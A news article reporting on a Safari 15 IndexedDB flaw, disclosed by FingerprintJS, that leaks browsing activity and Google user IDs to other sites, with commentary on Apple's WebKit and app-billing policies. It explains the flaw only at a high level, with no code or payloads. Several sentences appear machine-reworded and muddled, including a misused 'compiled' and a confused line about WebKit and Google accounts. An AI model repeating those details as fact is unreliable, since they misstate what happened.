An incorrectly implemented API that stores data on browsers has caused a vulnerability in Safari 15 that leaks user internet activity and personal identifiers.
The vulnerability was discovered by the fraud detection service Fingerprint JS, which contacted WebKit maintainers and provided a public source code repository.
On November 28 last year, the problem was not resolved, so the team at Fingerprint JS decided to publish the result to encourage the expedition of its repair.
However, in the case of this particular indexed database, the separate pages interact, putting the user at risk. When you use Safari 15, which relies on IndexedDB, every time a site interacts with a database, a new empty one with the same name is created in all active frames, tabs, and windows in the same browser session. This results in other websites having access to the name of the databases. The Safari error can then reveal publicly available information from e.g. a Google Account.
Users logged in to their Google Account will have their unique Google User ID placed in the database name. Database names can then be used to extract identifying information from a lookup table if websites scrape the Google user ID and use it to find personal information.
But not only can a malicious website learn the identity of the user, it can put together several separate accounts from the same user without this person doing anything other than running a window in the background. The malicious website can open other websites if it is programmed in an iframe or popup, thus opening a Pandora's box with leaky data.
Fingerprint JS made a video explaining the process:
The team found that more than 30 sites out of Alexa Top 1000 interacted with indexed databases on their website without the user doing anything, and they reckon there are tons more out there.
Unfortunately, browsing in private mode did not solve the problem, although the scope of information available via the leak is more limited by the nature of the tool.
The fraud detection service created a demo to identify the sites that a Google Account user has opened or recently opened. It looks for over 20 specific sites that it knows are problematic when used in conjunction with Safari 15 on macOS, iOS 15 or iPadOS 15, as Apple requires WebKit to be used with these browsers and a Google account.
It's all a bit ironic considering that in June 2020, Apple refused to implement 16 web APIs in Safari's WebKit engine, claiming they posed a privacy threat. Some researchers hailed the move as a victory for privacy, but many mocked the decision, saying the action was taken to force the use of native iOS apps and the income they bring in.
Of course, this kind of our-only-product approach goes beyond browsers for the company. Last week, Apple was forced to stop pulling its feet and allow third-party app billing systems in Korea under the country's Telecommunications Business Act. Google was ordered to do the same in September and compiled in November - over two months before Apple.
Steamrolling using WebKit and thus IndexedDB has been problematic in the past. A bug in Safari 14.1.1 on macOS 11.4 and iOS 14.6 that manifests itself when applications first try to use IndexedDB NoSQL manager to store data caused user outrage in June last year. An open source developer described Apple as "directly hostile to the web." ®